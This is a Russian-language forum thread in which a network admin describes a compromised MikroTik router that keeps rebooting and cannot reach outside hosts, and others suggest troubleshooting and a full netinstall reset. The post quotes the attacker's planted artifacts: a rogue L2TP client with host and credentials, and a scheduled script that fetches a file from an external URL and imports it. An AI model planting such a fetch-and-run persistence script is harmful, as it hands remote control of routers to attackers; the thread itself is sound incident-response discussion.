а, пардон, через тире)

Народ, пардоньте, глупый вопрос
Клиент пожаловался на то что роутер рестартует каздые 10-15 минут.
Залез на роутер нашёл перезагрузку от ватчдога (на 8.8.8.8)
Убедился что с роутера не пингуется 8.8.8.8 (но ИНОГДА проскакивает)
Полез глубже и нашел это:
Микротик роутер, с прошивкой 6.47.4 был каким-то образом взломан (сразу обновился до 6.48).
На него подсадили нового L2TP клиента, тыкающегося сюда:
s56.eeongous.com
login: user4368723
Pass: pass4368723

Траффик был в полочке
Также я нашел скрипт, вот с этим (интервал 3 минут):
/tool fetch url=http://weirdgames.info/poll/64ddd343-6350-46a5-999b-140cc709602a mode=http dst-path=7xe7zt46hb08
/import 7xe7zt46hb08

И длиннючий список сетей в Socks Settings, в разделе Access

Прибил все это.

Пинг на 8.8.8.8 не вернулся.
Отрубил ватчдог (но 8.8.8.8 не менял на другое), но система продолжает рестартовать, с логами про ватчдог таймаут.

Не могу поехать к клиенту, как вернуть восьмерочки?
Провайдер дает параметры инет по DHCP, само-собой и DNS провадера.
Провйдер - один из глобальных в моей области, игр с блокировкой восьмерочек ранее не замечено.
И что за странности с ватчдогом?
Делал экспорт конфиг, кроме перечисленных странностей, ничего неожиданного не нашёл.

Замените восьмерки на что-то менее нагруженное. 8.8.4.4, 1.1.1.1, 9.9.9.9 или яндекса ip (не помню наизусть)

Скажем так.. оно может и нагруженное, но на моей памяти просто так не было чтоб не шли хоть пинги

Вы пока ищите причину, роутер будет ребутаться.
Я б сначала протестил и перепрыгнул на одну из альтернатив, а потом уже искал почему восьмерки теряются.

А разве так бывает, чтоб ватчдог был отключен, но продолжал ребутать?

Был такой баг.
Приходилось в вачдог входить, включать, потом в активированном поле адрес удалять и снова выключать. Но это, вроде, пофиксили давно.
Поглядите вывод "/export".  Может где-то еще скриптами зарыта проверка и ребут.

Да весь экспорт пересмотрел уже..

К стати, 1.1.1.1 8.8.4.4 9.9.9.9 не пингует также...

а что-нибудь вообще пингует?

Хмм.. а ведь и в самом деле чет пинг никуда не идёт, кроме внутренних IP и DNS провайдера

Топать ножками. Полный сброс, обновление через нетинсталл и сброс до дефолтных с последующей настройкой

Неужели и в микрот уже стало возможным что-то встроить?!

Весело. В фаерволе точно нет запретов? . Или маркировок по протоколу в mangle?

Давно

Нет, прошел по всем запретам с отключением

В метароутере пусто, партишены кроме роутерос отсутствуют

Иногда бездумный запрет в input без указания "new, invalid" может такое дать.
Или явно разрешить в input established

И манглы стандартные, да и счетчики пустые

Там полностью поимели микрот и сеть. Надо рубить под корень, а не искать сорняки

Так уже даже инетерсно, вдруг пригодится